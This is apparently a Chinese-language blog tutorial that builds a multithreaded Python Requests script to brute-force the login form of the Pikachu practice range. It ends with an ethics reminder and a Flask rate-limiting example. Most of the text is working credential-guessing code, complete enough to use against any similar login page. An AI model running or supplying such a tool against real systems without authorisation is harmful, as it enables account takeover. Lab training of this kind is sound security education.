用Python+Requests库5分钟实现Pikachu靶场表单爆破

在安全测试领域,Burp Suite无疑是经典工具,但它的图形界面和复杂配置有时会成为学习障碍。今天我们将用Python的Requests库,从零构建一个轻量级表单爆破脚本,让你在5分钟内理解暴力破解的核心逻辑。

1. 为什么选择Python替代Burp Suite?

图形化工具 vs 代码脚本 的争论从未停止。Burp Suite确实强大,但存在几个明显痛点:

  • 资源占用高 :启动慢,对低配机器不友好
  • 学习曲线陡峭 :Intruder模块的四种攻击模式让新手困惑
  • 黑箱操作 :隐藏了底层HTTP请求细节

而Python脚本方案则具备:

# 典型优势对比
advantages = {
    "轻量化": "仅需几MB内存",
    "透明性": "每个请求参数可见可控",
    "可扩展": "可轻松集成其他库如多线程",
    "学习价值": "深入理解HTTP协议交互"
}

提示:本方案特别适合想真正理解Web安全原理,而非仅会点按钮的安全爱好者

2. 环境准备与靶场分析

2.1 基础环境配置

首先确保安装Python3和必要库:

pip install requests bs4

Pikachu靶场的表单登录页面通常具有以下特征:

<!-- 典型表单结构 -->
<form action="/login" method="POST">
    <input type="text" name="username">
    <input type="password" name="password">
    <button type="submit">登录</button>
</form>

通过浏览器开发者工具可捕获关键信息:

  1. 请求URL: http://target/login
  2. 请求方法:POST
  3. 参数名:username/password
  4. 成功响应:包含"login success"
  5. 失败响应:包含"username or password is not exists"

3. 核心爆破脚本开发

3.1 基础请求框架

先构建最简请求逻辑:

import requests

target_url = "http://pikachu/login"
test_data = {"username": "admin", "password": "123456"}

response = requests.post(target_url, data=test_data)
print(response.text)

3.2 字典加载与爆破循环

实现字典遍历功能:

def load_dict(file_path):
    with open(file_path) as f:
        return [line.strip() for line in f]

usernames = load_dict("user.dict")
passwords = load_dict("pass.dict")

for user in usernames:
    for pwd in passwords:
        data = {"username": user, "password": pwd}
        resp = requests.post(target_url, data=data)
        if "login success" in resp.text:
            print(f"[+] Found credentials: {user}:{pwd}")
            break

注意:实际使用时应添加请求间隔避免被封禁

3.3 会话保持与性能优化

原始脚本每次请求都是独立会话,需改进为:

session = requests.Session()  # 维持会话状态

# 添加超时和重试逻辑
adapter = requests.adapters.HTTPAdapter(
    max_retries=3,
    pool_connections=10,
    pool_maxsize=30
)
session.mount("http://", adapter)

4. 高级功能实现

4.1 多线程加速

使用concurrent.futures提升效率:

from concurrent.futures import ThreadPoolExecutor

def brute_force(credentials):
    user, pwd = credentials
    # 请求逻辑...

with ThreadPoolExecutor(max_workers=5) as executor:
    credentials = [(u,p) for u in usernames for p in passwords]
    executor.map(brute_force, credentials)

4.2 智能识别机制

改进响应识别逻辑:

def check_response(resp):
    if resp.status_code != 200:
        return False
    
    success_markers = ["welcome", "logout", "dashboard"]
    failure_markers = ["invalid", "not exists", "error"]
    
    html = resp.text.lower()
    return any(m in html for m in success_markers)

4.3 代理与异常处理

增加请求可靠性:

proxies = {"http": "http://127.0.0.1:8080"}  # 方便调试

try:
    resp = session.post(
        target_url,
        data=data,
        proxies=proxies,
        timeout=5,
        headers={"User-Agent": "Mozilla/5.0"}
    )
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

5. 完整脚本示例

最终整合版爆破脚本:

import requests
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urlparse

class BruteForcer:
    def __init__(self, target_url):
        self.target = target_url
        self.session = requests.Session()
        self.found = False
        
    def load_dict(self, file_path):
        with open(file_path) as f:
            return [line.strip() for line in f if line.strip()]
    
    def check_response(self, resp):
        return "login success" in resp.text
    
    def attack(self, credentials):
        if self.found: return
        
        user, pwd = credentials
        try:
            resp = self.session.post(
                self.target,
                data={"username": user, "password": pwd},
                timeout=3
            )
            if self.check_response(resp):
                print(f"\n[!] Valid credentials: {user}:{pwd}")
                self.found = True
        except Exception as e:
            print(f"[x] Error testing {user}:{pwd} - {str(e)}")
    
    def run(self, user_dict, pass_dict, threads=5):
        users = self.load_dict(user_dict)
        passes = self.load_dict(pass_dict)
        
        print(f"[*] Loaded {len(users)} users and {len(passes)} passwords")
        
        with ThreadPoolExecutor(max_workers=threads) as executor:
            tasks = [(u,p) for u in users for p in passes]
            executor.map(self.attack, tasks)
        
        if not self.found:
            print("[x] No valid credentials found")

if __name__ == "__main__":
    target = "http://pikachu/login"
    bruteforcer = BruteForcer(target)
    bruteforcer.run("users.txt", "passwords.txt")

6. 防御措施与伦理提醒

虽然我们实现了爆破工具,但必须强调:

合法使用原则

  • 仅针对授权测试目标
  • 禁止用于非法入侵
  • 企业系统应部署防护措施:
# 服务端防护示例
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

limiter = Limiter(
    key_func=get_remote_address,
    default_limits=["5 per minute"]
)

实际测试中,建议结合验证码、IP限制、双因素认证等多层防护。

更多推荐